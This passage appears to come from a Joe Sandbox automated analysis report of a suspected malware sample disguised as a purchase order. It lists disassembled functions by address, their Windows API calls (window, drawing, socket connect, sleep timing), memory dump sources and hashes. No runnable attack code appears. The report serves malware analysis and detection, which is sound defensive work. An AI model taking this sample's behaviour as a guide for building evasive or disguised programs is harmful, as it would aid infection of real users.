                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Enum$CloseDeleteOpen
                                  • String ID:
                                  • API String ID: 2095303065-0
                                  • Opcode ID: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
                                  • Instruction ID: 7ca4c7ada97503ad9332fce322fe5d5fc03c2789ff93db080e75f28165cdf273
                                  • Opcode Fuzzy Hash: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
                                  • Instruction Fuzzy Hash: 69317CB2940108BAEB10DBD4DC85FFEB77CEB49304F04456EF605A7241D774AA858BA8
                                  Function 00436A0B Relevance: 7.6, APIs: 5, Instructions: 103COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetWindowRect.USER32(?,?), ref: 00436A24
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: RectWindow
                                  • String ID:
                                  • API String ID: 861336768-0
                                  • Opcode ID: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
                                  • Instruction ID: 0a42da3bb0701689e96ef39581243ed39d97d4ba46bd7cd8c1f057aae640e0d3
                                  • Opcode Fuzzy Hash: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
                                  • Instruction Fuzzy Hash: E531EA7160021EAFDB00DF68D988AAE77A5EB49324F11C62AFD24E7380D774EC11CB90
                                  Function 00449555 Relevance: 7.6, APIs: 5, Instructions: 96windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • SendMessageW.USER32 ref: 00449598
                                    • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                                  • SendMessageW.USER32(?,00001074,?,?), ref: 004495F8
                                  • _wcslen.LIBCMT ref: 0044960D
                                  • _wcslen.LIBCMT ref: 0044961A
                                  • SendMessageW.USER32(?,00001074,?,?), ref: 0044964E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: MessageSend$_wcslen$_wcspbrk
                                  • String ID:
                                  • API String ID: 1856069659-0
                                  • Opcode ID: eb2345d78995945919f1fca8909d98cd083db74a4e9b61e28a7ea2bcab757230
                                  • Instruction ID: 683be220b4a5e9d86ccbf412c3bd2f13dbb60120779f28b1c577ab6eeef24407
                                  • Opcode Fuzzy Hash: eb2345d78995945919f1fca8909d98cd083db74a4e9b61e28a7ea2bcab757230
                                  • Instruction Fuzzy Hash: 77318F71A00218ABEB20DF59DC80BDFB374FF94314F10466AFA0497280E7B59D958B94
                                  Function 00447BF1 Relevance: 7.6, APIs: 5, Instructions: 95COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetWindowRect.USER32(?,?), ref: 00447C5D
                                  • ScreenToClient.USER32(?,?), ref: 00447C7B
                                  • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                                  • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                                  • EndPaint.USER32(?,?), ref: 00447D13
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: ClientPaintRectRectangleScreenViewportWindow
                                  • String ID:
                                  • API String ID: 659298297-0
                                  • Opcode ID: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
                                  • Instruction ID: 3c0582d8bc81ba5dadaaf244cb1f1d3939805113443e317e1f98b5bdeebaec33
                                  • Opcode Fuzzy Hash: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
                                  • Instruction Fuzzy Hash: C33161706043019FE310CF25D8C8F7B7BE8EB86724F144A6EF9A5872A1C774A845DB69
                                  Function 004487EA Relevance: 7.6, APIs: 5, Instructions: 89COMMON
                                  Download Yara Rule
                                  APIs
                                  • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                  • EnableWindow.USER32(?,00000001), ref: 00448B72
                                  • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                  • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                  • EnableWindow.USER32(?,00000001), ref: 00448C09
                                    • Part of subcall function 00440D98: SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00440DB8
                                    • Part of subcall function 00440D98: 742845F0.USER32(?,000000F0,?,?,000000F0,00000000,00000000), ref: 00440DFA
                                    • Part of subcall function 00440D98: 742845F0.USER32(?,000000F0,?,?,000000F0,00000000,00000000), ref: 00440E3A
                                    • Part of subcall function 00440D98: SendMessageW.USER32(019E1CA8,000000F1,00000000,00000000), ref: 00440E6E
                                    • Part of subcall function 00440D98: SendMessageW.USER32(019E1CA8,000000F1,00000001,00000000), ref: 00440E9A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Window$EnableMessageSend$742845Show
                                  • String ID:
                                  • API String ID: 962000629-0
                                  • Opcode ID: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
                                  • Instruction ID: c941ec4e4e3d0536419715940b2668e48b64c275bb9f23e9dd6fd7b29375311a
                                  • Opcode Fuzzy Hash: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
                                  • Instruction Fuzzy Hash: DE21F7B17443805BF7258E24CCC4BAFB7D0EF56345F08482EF98196391DBACA885C75A
                                  Function 004550FC Relevance: 7.6, APIs: 5, Instructions: 78COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
                                  • Instruction ID: af34b986bc09d21a6a739d25b45c5a22770885c200d938a8bd6fc5fff5094107
                                  • Opcode Fuzzy Hash: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
                                  • Instruction Fuzzy Hash: 5921AE75200600DBC710EF29E9D496B77B9EF49362B00466EFE5197392DB34EC09CB69
                                  Function 00445870 Relevance: 7.6, APIs: 5, Instructions: 78windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • IsWindowVisible.USER32(?), ref: 00445879
                                  • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00445893
                                  • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 004458CD
                                  • _wcslen.LIBCMT ref: 004458FB
                                  • CharUpperBuffW.USER32(00000000,00000000), ref: 00445905
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen
                                  • String ID:
                                  • API String ID: 3087257052-0
                                  • Opcode ID: f69ffadf962ece00da2d3b786a5ca76815724ee7e4437aac7967cccaf73e78c3
                                  • Instruction ID: ced771b0f23340e5f55e8fdbc4e1763ce6d97a07fd0b425722e47bce61cb145a
                                  • Opcode Fuzzy Hash: f69ffadf962ece00da2d3b786a5ca76815724ee7e4437aac7967cccaf73e78c3
                                  • Instruction Fuzzy Hash: F51136726009017BFB10AB25DC06F9FB78CAF65360F04403AF909D7241EB69ED5983A9
                                  Function 004653C8 Relevance: 7.6, APIs: 5, Instructions: 72networkCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                                  • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 004653FE
                                  • WSAGetLastError.WSOCK32(00000000), ref: 0046540D
                                  • connect.WSOCK32(00000000,?,00000010), ref: 00465446
                                  • WSAGetLastError.WSOCK32(00000000), ref: 0046546D
                                  • closesocket.WSOCK32(00000000,00000000), ref: 00465481
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: ErrorLast$closesocketconnectinet_addrsocket
                                  • String ID:
                                  • API String ID: 245547762-0
                                  • Opcode ID: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
                                  • Instruction ID: 0a95abeaf907522bb910ccff47ca5b8cdb65f95d12881c86cce1eb50970c9d0a
                                  • Opcode Fuzzy Hash: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
                                  • Instruction Fuzzy Hash: E921F032200510ABD310EF29DC49F6EB7E8EF44725F008A6FF844E72D1DBB4A8418B99
                                  Function 0044719B Relevance: 7.6, APIs: 5, Instructions: 70COMMON
                                  Download Yara Rule
                                  APIs
                                  • DeleteObject.GDI32(00000000), ref: 004471D8
                                  • ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                  • SelectObject.GDI32(?,00000000), ref: 00447228
                                  • BeginPath.GDI32(?), ref: 0044723D
                                  • SelectObject.GDI32(?,00000000), ref: 00447266
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Object$Select$BeginCreateDeletePath
                                  • String ID:
                                  • API String ID: 2338827641-0
                                  • Opcode ID: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                                  • Instruction ID: fd3aca4fc88a528095528039be3f852d236b7ebb9f74560e76bd8f11b15fbd2f
                                  • Opcode Fuzzy Hash: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                                  • Instruction Fuzzy Hash: 92214F71905204AFEB10DF689D48A9E7FACFB16310F14466BF910D32A1DBB49C85CBAD
                                  Function 00434582 Relevance: 7.6, APIs: 5, Instructions: 61sleepCOMMON
                                  Download Yara Rule
                                  APIs
                                  • Sleep.KERNEL32(00000000), ref: 00434598
                                  • QueryPerformanceCounter.KERNEL32(?), ref: 004345B5
                                  • Sleep.KERNEL32(00000000), ref: 004345D4
                                  • QueryPerformanceCounter.KERNEL32(?), ref: 004345DE
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: CounterPerformanceQuerySleep
                                  • String ID:
                                  • API String ID: 2875609808-0
                                  • Opcode ID: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                                  • Instruction ID: a92d15520113c221d818f77e193bed66bb4dcccdbbd961c90b57f37ba003579f
                                  • Opcode Fuzzy Hash: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                                  • Instruction Fuzzy Hash: 37118232D0011DA7CF00EF99DD49AEEBB78FF99721F00456AEE4473240DA3465618BE9
                                  Function 00460C01 Relevance: 7.5, APIs: 5, Instructions: 48windowtimeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetDlgItem.USER32(?,000003E9), ref: 00460C17
                                  • GetWindowTextW.USER32(00000000,?,00000100), ref: 00460C2E
                                  • MessageBeep.USER32(00000000), ref: 00460C46
                                  • KillTimer.USER32(?,0000040A), ref: 00460C68
                                  • EndDialog.USER32(?,00000001), ref: 00460C83
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: BeepDialogItemKillMessageTextTimerWindow
                                  • String ID:
                                  • API String ID: 3741023627-0
                                  • Opcode ID: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
                                  • Instruction ID: 069ac2582a8c3c153a507cef710a9e07e91c6f457c78871e3a9641c65eda6ae6
                                  • Opcode Fuzzy Hash: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
                                  • Instruction Fuzzy Hash: AB01DD315403086BE7349B54EE8DBDB737CFB14705F00465FB645921C0E7F4A9948B95
                                  Function 004556A0 Relevance: 7.5, APIs: 5, Instructions: 45COMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: 74285DeleteObject$CursorDestroy
                                  • String ID:
                                  • API String ID: 2795845607-0
                                  • Opcode ID: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
                                  • Instruction ID: b4c4dbb9b59ba1bd7f08d964dfa6937d7ad9fb038e30cf105cf785d591c64ca0
                                  • Opcode Fuzzy Hash: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
                                  • Instruction Fuzzy Hash: D5014870301A01DBDB10EF65E9D8A2B77A8BF48762F10462AFD04D7352D739D849CBA9
                                  Function 004555ED Relevance: 7.5, APIs: 5, Instructions: 43windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • SendMessageW.USER32(?,00001101,00000000,?), ref: 004555FC
                                  • DeleteObject.GDI32(?), ref: 00455736
                                  • DeleteObject.GDI32(?), ref: 00455744
                                  • DestroyCursor.USER32(?), ref: 00455752
                                  • 74285CF0.USER32(?), ref: 00455760
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: DeleteObject$74285CursorDestroyMessageSend
                                  • String ID:
                                  • API String ID: 2326558736-0
                                  • Opcode ID: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
                                  • Instruction ID: 3262712e9a8127eed33bb9eb3d9864066e7dde5d47db0d590f2b6463dd6d37f9
                                  • Opcode Fuzzy Hash: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
                                  • Instruction Fuzzy Hash: 07017C74300601DBCB10EF25EEC8A2A73A8BF48712F004569FE019B286D778DC49CB68
                                  Function 00455607 Relevance: 7.5, APIs: 5, Instructions: 42COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                                  • 74285CF0.USER32(?), ref: 00455728
                                  • DeleteObject.GDI32(?), ref: 00455736
                                  • DeleteObject.GDI32(?), ref: 00455744
                                  • DestroyCursor.USER32(?), ref: 00455752
                                  • 74285CF0.USER32(?), ref: 00455760
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: 74285DeleteObject$CursorDestroyInvalidateRect
                                  • String ID:
                                  • API String ID: 3424818771-0
                                  • Opcode ID: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                                  • Instruction ID: 2016740d4609c4bbd0e5f1cf6dc7522ca00853e433b5032f7809eda0dc31aff9
                                  • Opcode Fuzzy Hash: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                                  • Instruction Fuzzy Hash: 3701F670200601DBCB10EF69E9D8A2B37ACAF49762B00466AFD01D7256D769DC498B69
                                  Function 00417803 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • __getptd.LIBCMT ref: 0041780F
                                    • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                                    • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                                  • __getptd.LIBCMT ref: 00417826
                                  • __amsg_exit.LIBCMT ref: 00417834
                                  • __lock.LIBCMT ref: 00417844
                                  • __updatetlocinfoEx_nolock.LIBCMT ref: 00417858
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                  • String ID:
                                  • API String ID: 938513278-0
                                  • Opcode ID: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                                  • Instruction ID: 276dd8d19a6a3be70f37c916a71154ef36d62806621923b96dbf7b6e4fe89171
                                  • Opcode Fuzzy Hash: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
